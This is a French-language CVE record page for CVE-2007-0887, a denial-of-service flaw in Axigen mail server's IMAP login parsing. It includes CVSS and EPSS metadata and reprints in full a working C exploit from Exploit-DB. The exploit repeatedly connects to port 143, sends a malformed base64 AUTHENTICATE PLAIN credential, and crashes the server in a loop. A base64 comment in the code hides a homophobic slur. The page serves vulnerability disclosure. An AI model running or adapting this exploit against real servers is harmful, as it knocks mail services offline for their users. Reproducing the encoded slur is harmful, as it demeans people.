CVE-2007-0887
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
axigen 1.2.6 through 2.0.0b1 does not properly parse login credentials, which allows remote attackers to cause a denial of service (NULL dereference and application crash) via a base64-encoded "*\x00" sequence on the imap port (143/tcp).
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| NULL Pointer Dereference The product dereferences a pointer that it expects to be valid but is NULL. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 3290
Date de publication : 2007-02-07 23h00 +00:00
Auteur : mu-b
EDB Vérifié : Yes
/* doaxigen-v2.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sun Oct 29 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* parsing error results in login without username & password!
* which in turn causes a NULL pointer dereference..
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "1 AUTHENTICATE PLAIN\r\n"
#define APPEND_CMD "2 APPEND digit-labs\r\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int base64 (const u_char * ibuf, u_char * obuf, size_t n);
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void zhammer (u_char * host);
static int
base64 (const u_char * ibuf, u_char * obuf, size_t n)
{
int a, b, c;
int i, j;
int d, e, f, g;
a = b = c = 0;
for (j = i = 0; i < n; i += 3)
{
a = (u_char) ibuf[i];
b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;
c = i + 2 < n ? (u_char) ibuf[i + 2] : 0;
d = base64tab[a >> 2];
e = base64tab[((a & 3) << 4) | (b >> 4)];
f = base64tab[((b & 15) << 2) | (c >> 6)];
g = base64tab[c & 63];
if (i + 1 >= n)
f = '=';
if (i + 2 >= n)
g = '=';
obuf[j++] = d, obuf[j++] = e;
obuf[j++] = f, obuf[j++] = g;
}
obuf[j++] = '\0';
return strlen (obuf);
}
static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;
rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';
return (rbytes);
}
static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void
zhammer (u_char * host)
{
int sock;
u_int i;
u_char *md5 = "*\x00"; /* what was that? */
u_char sbuf[BBUF_SIZE], *sptr;
u_char rbuf[BUF_SIZE];
fd_set r_fds;
struct timeval tv;
base64 (md5, sbuf, strlen (md5)+1);
sptr = sbuf + strlen (sbuf);
*sptr++ = '\r', *sptr++ = '\n', *sptr = '\0';
for (i = 0; i < -1; i++)
{
int rbytes;
printf ("+Connecting to %s:%d. ", host, PORT_IMAPD);
sock = sockami (host, PORT_IMAPD);
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
return;
sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
break;
sock_send (sock, sbuf, strlen (sbuf));
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
break;
if (!strcmp (rbuf, "1 OK Done AUTHENTICATE"))
{
printf ("+Bah not vulnerable\n");
exit (EXIT_SUCCESS);
}
sock_send (sock, APPEND_CMD, strlen (APPEND_CMD));
FD_ZERO (&r_fds);
FD_SET (sock, &r_fds);
tv.tv_sec = 2; /* wait 2 seconds */
tv.tv_usec = 0;
rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);
if (rbytes == -1) /* oh dear */
perror ("select()");
else if (rbytes > 1) /* read response */
{
printf ("+Bah not vulnerable %d\n", rbytes);
exit (EXIT_SUCCESS);
}
/* timeout, server appears to have crashed!@$%! */
printf ("Wh00t\n");
fflush (stdout);
sleep (RCNT_DELAY);
}
}
int
main (int argc, char **argv)
{
printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\n"
"by: <mu-b@digit-labs.org>, <mu-b@65535.com>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
zhammer (argv[1]);
return (EXIT_SUCCESS);
}
// milw0rm.com [2007-02-08]
Products Mentioned
Configuraton 0
Gecad_technologies>>Axigen_mail_server >> Version 1.2.6
Gecad_technologies>>Axigen_mail_server >> Version 2.0.0b1
- Gecad_technologies>>Axigen_mail_server >> Version 2.0.0b1 (Open CPE detail)
